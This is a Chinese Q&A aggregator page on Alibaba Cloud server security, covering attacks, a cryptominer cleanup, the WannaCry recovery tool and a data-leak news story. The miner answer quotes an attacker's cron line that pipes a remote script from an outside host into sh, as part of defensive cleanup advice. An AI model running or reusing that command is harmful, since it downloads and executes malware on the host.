導航:首頁 > 配伺服器 > 阿里雲伺服器安全事件

阿里雲伺服器安全事件

發布時間:2022-09-19 21:23:58

⑴ 我們公司想購買一台阿里雲伺服器,做一個服務內部的平台,會被經常攻擊嗎

摘要 你好,選擇任何一家雲服務商的伺服器都有被攻擊的可能,阿里雲也不例外,是否會遭到攻擊與所選商家關系不大,而主要看你的網站或應用性質。阿里雲伺服器被攻擊的用戶也屢見不鮮,只能在日常經常維護管理。

⑵ 阿里雲伺服器總是被攻擊,基本上剛買就會被攻擊,是為什麼

歸屬於阿里雲伺服器的ip是有范圍值的。
阿里屬於比較大型的伺服器提供商,雲主機伺服器租用量較大。
有可能攻擊並不是針對你的,而是之前別的雲主機使用了這個ip,然後退用了雲主機後ip重新歸屬,正好被你用上了。所以就一租用就被攻擊了。
伺服器和網站被攻擊的話,建議檢查下伺服器的系統日誌和網站運行的日誌,分析確定下是受到了什麼類型的攻擊,然後伺服器是哪個調解下相應的安全策略來進行防禦。
也可以安裝安全狗之類的防護軟體來進行防禦。
伺服器安全狗主要保護伺服器免遭惡意攻擊,包括DDOS、ARP防火牆、遠程桌面守護、埠保護、網路監控等。
網站安全狗主要保護伺服器上網站的安全,包括網馬掛馬掃描、SQL注入防護,CC攻擊防護,資源保護等。
兩者防護方向不同。建議結合使用可以讓保護更全面。
在防禦的同時,可以查看防護日誌,了解伺服器和網站受到的是什麼類型的攻擊,然後針對攻擊類型來調節防護規則,可以更為有效地進行防禦。

⑶ 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權, 在沒有找到根源前,千萬不要刪除 minerd,因為刪除了,過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top,查看了一會,沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句:

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下,感興趣的可以研究下:

View Code

解決minerd並不是最終的目的,主要是要查找問題根源,我的伺服器問題出在了redis服務了,黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權,http://blog.jobbole.com/94518/然後就注入了病毒,下面是解決辦法和清除工作:

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」,區分普通用戶和admin許可權,普通用戶將會被禁止運行某些命令,如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表,是不是有你不認識的用戶添加進來。 如果有就刪除掉.

⑷ 阿里雲伺服器檢測說有木馬,但具體是不是真的,請賜教。

看上去像是,因為我觀察到伺服器中木馬的一種同樣的現象,就是偽裝成所謂的正常文件來欺騙過用戶的眼睛。(例如圖中的 /etc/init.d/selinux這種與伺服器日常運行穩定不太相關的東西是被替換的高發文件)
同樣,圖中下面提到的/usr/bin/bsd-port 也並不是linux本來就有的東西(如果你沒有安裝過),這的確可疑。
趕緊上伺服器刪文件去吧,這確實是中木馬了。

⑸ 阿里雲雲盾wannacry勒索加密文件恢復工具怎麼使用

從5月12日爆發至今,名為WannaCry的勒索病毒讓全球數十萬Windows計算機中招,黑客將用戶計算機中的重要文件實施加密,並索要贖金解鎖。這種情況如果發生在企業伺服器當中,那麼將帶來嚴重損失。

對此,阿里雲安全團隊經過不懈努力研究,終於找到解救被WannaCry病毒劫持的計算機的辦法。

5月20日,阿里雲安全團隊向雲上、雲下伺服器用戶開放勒索病毒「一鍵解密和修復」工具。經過實際測試,如果被勒索後未重啟操作系統,該工具可以恢復已被WannaCry勒索病毒加密的文件。

阿里雲建議,在勒索病毒「中招後」,不要馬上關閉、重啟操作系統,也不要去手工查殺病毒,直接使用該修復工具嘗試恢復數據。

軟體名稱:阿里雲雲盾勒索病毒專殺工具(WannaCry文件恢復工具) v1.0 中文綠色版(附使用教程)軟體大小:0.97MB更新時間:2017-05-22
一、適用范圍

該工具適用於雲上、雲下Windows伺服器操作系統用戶。

操作系統版本包括:Windows Server 2003、Windows Server 2008。

二、工作原理及研究基礎
本次發布的修復工具基於wannakiwi項目的研究成果:既通過搜索內存中的數據,獲取解密的關鍵素數來進行數據解密。

阿里雲安全團隊在此研究基礎上,進行調試和封裝,讓工具簡單易用。

三、如何恢復

請按以下步驟進行操作:

1、按照文末給出的鏈接,下載修復工具到被加密的伺服器或PC機器上。

2、雙擊運行,如下圖所示:

3、點擊「恢復文件」按鈕,執行文件恢復功能,期間執行時間會較長,請耐心等待。

4、恢復數據完畢後,點擊「清除病毒」按鈕,清理掉蠕蟲病毒程序及服務。

三、注意事項

在大多數情況下,加密的文件可以被成功恢復。

也有因內存數據被二次寫入,覆蓋原有加密狀態時的數據,導致數據恢復不成功的案例。

這是因為,該工具通過暴力搜索內存中的數據,獲取解密的關鍵素數來進行數據解密。一旦重啟或手工查殺會導致該數據被覆蓋,則永久無法直接解密。

不過,如果使用該工具時,出現數據解密失敗,不會對系統造成任何影響。

此外,用戶也可以選擇使用磁碟數據恢復軟體來嘗試恢復數據。

⑹ 阿里雲伺服器顯示異地登陸,阿里雲可靠嗎還敢用嗎

阿里雲的安全你不用懷疑,如果異地登錄,可能是密碼泄漏了,建議修改密碼。另外阿里雲的ip有時候有誤報,所以你不用緊張。做好網站數據備份~

⑺ 請教:阿里雲報出的安全威脅,我找不到應如何處理

理解雲盾態勢感知服務提供的安全事件和安全威脅信息僅作為您評估安全風險和做出安全決策的參考,您基於雲盾態勢感知服務進行的任何行為的風險和後果由您自行承擔。4 知識產權4.1 您應保證提交阿里雲的素材、對阿里

⑻ 阿里雲伺服器太不安全了,老是被攻擊,工作人員就負責把伺服器給我關了

阿里雲現在不比以前了!服務沒有以前那麼好了!提交一個工單跟你玩了7天,關鍵是問題還沒解決,最後的答復是就是要你備份好文件,重裝系統。最可氣的就是一個工單換了好幾個人跟只能要他聯系你。10分鍾的事情硬是搞個3-5天。----以上是我親身經歷的!要工單截圖我都可以給你。

建議

遠離大平台:

1,客戶多別人照顧不了你這樣的小客戶。

2,阿里雲向別人說的沒有防禦系統都是炒房子一樣過來這陣風基本上也就拜拜了。

選擇適合自己的平台

1,如果是公司網站可以選擇一些像網路雲,華為雲,騰訊雲的代理機構。因為他要賺錢必須把你當上帝。服務也及時。還會免費的教你怎麼怎麼弄。

⑼ 阿里雲傳來壞消息,未經用戶許可泄露信息,滴滴事件重演

在滴滴事件發生之後,國內所有互聯網公司都加大了對用戶信息安全保障的重視程度。因為國內對滴滴採取的行動,讓它們都感到了一陣後怕,誰也不想變成下一個「滴滴」。

但就在8月23日這天,阿里雲傳來壞消息,未經用戶許可泄露信息,讓很多人都表示,難道滴滴事件要重演?那麼這究竟是怎麼回事呢?阿里雲為什麼會泄露用戶信息?

在回答這些問題之前,先來了解一下阿里雲,畢竟很多人都不知道阿里雲到底是干什麼的。公開資料顯示,阿里雲成立於2009年,是全球領先的雲計算以及人工智慧 科技 公司,致力於為客戶提供安全、可靠的計算和數據處理能力。

而截至目前,阿里雲已經成為了國內排名第一,全球排名第三的雲服務商,客戶遍及全球。像大家熟知的12306購票網站,之所以能夠流暢地運行下去,有很大一部分原因都來自於阿里雲的鼎力支持,還有中國聯通、中石化等公司,都與阿里雲建立了緊密的合作關系。

毫不誇張地說,在如今這個信息時代,阿里雲發揮出了重要的作用,基本上各個領域都能看到它的身影,例如上次東京奧運會的轉播,也有阿里雲的參與。而且為了保證能夠給客戶提供更好的服務,阿里雲在全球各地都建有數據中心,布局非常完善。

但值得一提的是,雲計算和雲服務也存在一定的風險,將數據存儲在雲伺服器裡面,同樣會出現泄漏的情況。而就在8月23日這天,浙江省通信管理局在一份對投訴人的答復函中明確表示,已核實阿里雲未經用戶許可將留存的注冊信息泄露給第三方公司。

也就是說,用戶留存在阿里雲中的注冊信息,被阿里雲泄漏給了第三方公司,目前浙江省通信管理局已責令阿里雲改正。這對於阿里雲來說,無疑是一個壞消息,身為國內最大的雲服務商,如果連用戶的信息安全都保障不了,還怎麼留住客戶?

而且這起事件原本是發生在2019年11月份,但浙江省通信管理局直到今年7月份才給投訴者答復,如果不是8月23日被曝光了,人們還不知道原來阿里雲也存在信息泄露的風險。

按理說,用戶把注冊信息留存在阿里雲,是對它的信賴和認可,但沒想到阿里雲辜負了用戶的信任,在未經用戶同意的情況下,將注冊信息泄露給了第三方公司。雖然目前還不知道這些注冊信息重不重要,但只要是涉及到信息安全的問題,都不能掉以輕心。

再加上現在阿里雲已經覆蓋到了各個領域,小到個人的隱私信息,大到國家的關鍵數據,阿里雲都扮演了一個重要的角色。假如阿里雲不把信息安全放在心上,那麼用戶將不會再信賴它,客戶也會尋找其它的雲服務商,畢竟國內又不是只有阿里雲。

至於滴滴事件將重演,這種說法就有點太嚴重了,阿里雲泄露用戶信息,只是個別情況,只要認真整改就行了,不會像滴滴那樣,受到國內七大部門的聯合審查。但是這兩起事件的性質是一樣的,都是關於用戶信息安全保障,只不過阿里雲沒有滴滴那麼嚴重。

就目前來看,滴滴事件仍然沒有一個明確的結果,誰也不知道它到底做了什麼。但有一點可以肯定的是,在事件發生之後,滴滴的市值已經接近腰斬,基本不可能再回到巔峰時期,那些投資者們也是損失慘重。

更有甚者,如果滴滴被證實出賣了一些重要信息,那麼它或許會從美國退市,回歸私有化,這便是它罔顧信息安全保障的下場。想必滴滴在上市之前也沒有料到,原本一切順利的計劃,卻因為信息安全問題被國內抓到了把柄,而且還沒法為自己爭辯。

現在阿里雲也出現了和滴滴一樣的情況,盡管不如它嚴重,但也要引起重視,因為一個用戶的信息泄露,就代表有很多用戶都存在同樣的風險。阿里雲必須給用戶一個滿意的答復,不然的話這起事件將會成為它的污點,不利於接下來的發展。

當然了,用戶的信息被泄露,也有可能不是阿里雲的本意,畢竟有那麼多數據和信息,阿里雲不可能每一個都照顧到。但不管怎樣,既然這是阿里雲的業務,只要出現了問題,阿里雲就應該承擔責任,用戶也不想找不到源頭。

事實上,在滴滴事件曝光之後,國內已經明顯加強了對互聯網行業的管控力度,尤其是信息安全這塊兒,更是受到了前所未有的重視。然而就如今的局面來看,國內的互聯網公司們,還沒有真正意識到問題的嚴重性,尤其是那些巨頭,依舊在我行我素。

如果繼續這樣發展下去,滴滴絕對不會是最後一個接受審查的互聯網公司,一旦其它企業也發生了類似的情況,國內同樣會展開全面調查,到時候滴滴事件就真的要重演了。這顯然是國內和廣大用戶都不想看到的結果,互聯網行業應該早做打算。

所以說,別看阿里雲未經用戶許可泄露注冊信息這件事鬧得不是很大,現在也沒多少人關注,但是卻反映出了一些值得深思的問題。阿里雲本身是阿里旗下的產業,而阿里又是國內最大的互聯網公司之一,連它都規范不了自己的行為,何談其它企業?

好在國內已經採取了相應的措施,今年9月1日過後,《網路產品安全漏洞管理規定》這項新規就會正式開始實施,國內各大互聯網巨頭都必須要遵守。正所謂沒有規矩不成方圓,相信在國內出手後,類似於滴滴的事件就會明顯減少,直到徹底消失。

綜上所述,阿里雲傳來的壞消息,同樣是關於用戶信息安全的,未經許可泄露用戶信息,這種行為顯然是錯誤的。希望今後阿里雲能認真整改,積極吸取教訓,不要重蹈滴滴的覆轍,不然就算再強大,也會有沒落的一天。

對此,你們怎麼看呢?歡迎留言和轉發。

閱讀全文

與阿里雲伺服器安全事件相關的資料

熱點內容
波形分析演算法 瀏覽:526
php論壇實訓報告 瀏覽:403
java日期字元串轉換成日期 瀏覽:135
linuxsftp連接 瀏覽:934
光伏日發電量演算法 瀏覽:125
小肚皮app怎麼才有vip 瀏覽:616
php全形轉換半形 瀏覽:927
java字元序列 瀏覽:539
杭州編譯分布式存儲區塊鏈 瀏覽:575
材料壓縮曲線 瀏覽:247
linux命令排序 瀏覽:151
手機熱點加密為啥連接不上電腦 瀏覽:979
編譯器合並計算 瀏覽:959
android音頻曲線 瀏覽:343
linuxftp自動登錄 瀏覽:802
運行編譯後網頁 瀏覽:70
閱讀app怎麼使用 瀏覽:319
centos防火牆命令 瀏覽:432
命令行變更 瀏覽:332
linux設備和驅動 瀏覽:207